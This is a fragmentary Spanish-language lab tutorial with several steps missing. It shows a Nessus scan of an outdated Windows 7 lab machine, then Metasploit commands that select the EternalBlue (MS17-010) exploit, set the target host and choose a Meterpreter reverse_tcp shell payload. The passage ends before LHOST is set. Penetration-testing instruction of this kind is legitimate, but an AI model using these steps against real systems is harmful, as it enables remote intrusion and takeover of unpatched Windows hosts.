Professional Documents
Culture Documents
root@KALI-LINUX-2017:~# cd Descargas
[##################################################]
Starting Nessus : .
root@KALI-LINUX-2017:~/Descargas#
7. Nos sale la siguiente ventana donde debemos crear un usuario y contrasea para administrar Nesuss. Le damos a Continue.
8. En la siguiente pantalla nos pide un cdigo de activacin, para ello debemos hacer click en Registering this scanner. Nos pedir un correo
electrnico para enviarnos el cdigo de activacin.
9. Le damos a Register Now y nos registramos. Comprobamos nuestro correo y copiamos el cdigo para la activacin.
10. Volvemos a la pgina Registration, utilizamos el cdigo recibido por correo y le damos a Continue.
11. Nos parece la siguiente pantalla, tarda unos minutos en finalizar la instalacin.
12. En la siguiente pantalla nos pide que nos autentiquemos con el usuario y contrasea creados anteriormente.
16. En Nessus realizamos tantos escaneos de vulnerabilidades como host descubiertos tengamos.
18. Rellenamos los campos con un nombre para el escaneo de vulnerabilidades y la IP del objetivo. Desplegamos donde dice Save y elegimos la
opcin Launch. En este caso he elegido una mquina con Windows 7 Professional desactualizado.
22. Hacemos click sobre Vulnerabilities y nos muestra an ms detalles del resultado. Observad la segunda vulnerabilidad crtica MS17-010,
ms conocida como ETERNALBLUE. ETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE y ETERNALSYNERGY son cuatro de las
mltiples vulnerabilidades y exploits reveladas el 2017/04/14 por un grupo conocido como los Shadow Brokers. WannaCry / WannaCrypt
es un programa de ransomware que utiliza el exploit ETERNALBLUE, y EternalRocks es un gusano que WannaCry lo utiliza para propagarse.
Petya es un programa de ransomware que utiliza CVE-2017-0199, una vulnerabilidad en Microsoft Office, y luego se propaga a travs de
ETERNALBLUE.
24. Por defecto nos guarda el archivo en Descargas. Para que sea ms fcil movemos el archivo a la Carpeta Personal.
root@KALI-LINUX-2017:~# msfconsole q
Ingrsela nuevamente:
msf > ls
[*] exec: ls
Descargas
Documentos
Escritorio
Imgenes
Msica
Plantillas
Pblico
Vdeos
WIN7_b25wpl.nessus Aqu tenemos el archivo .nessus
Ahora utilizamos el siguiente comando para importar el archivo generado por Nessus:
28. Ahora con el comando vulns nos mostrar las vulnerabilidades descubiertas por Nesuss.
Matching Modules
exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
31. Ahora vamos a configurar el parmetro RHOST que es necesario para llevar a cabo el ataque.
msf exploit(ms17_010_eternalblue) > set RHOST 192.168.24.137
RHOST => 192.168.24.137
32. Utilizaremos el payload windows/x64/meterpreter/reverse_tcp
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
33. Ahora vamos a configurar el parmetro LHOST que es necesario para cargar el payload.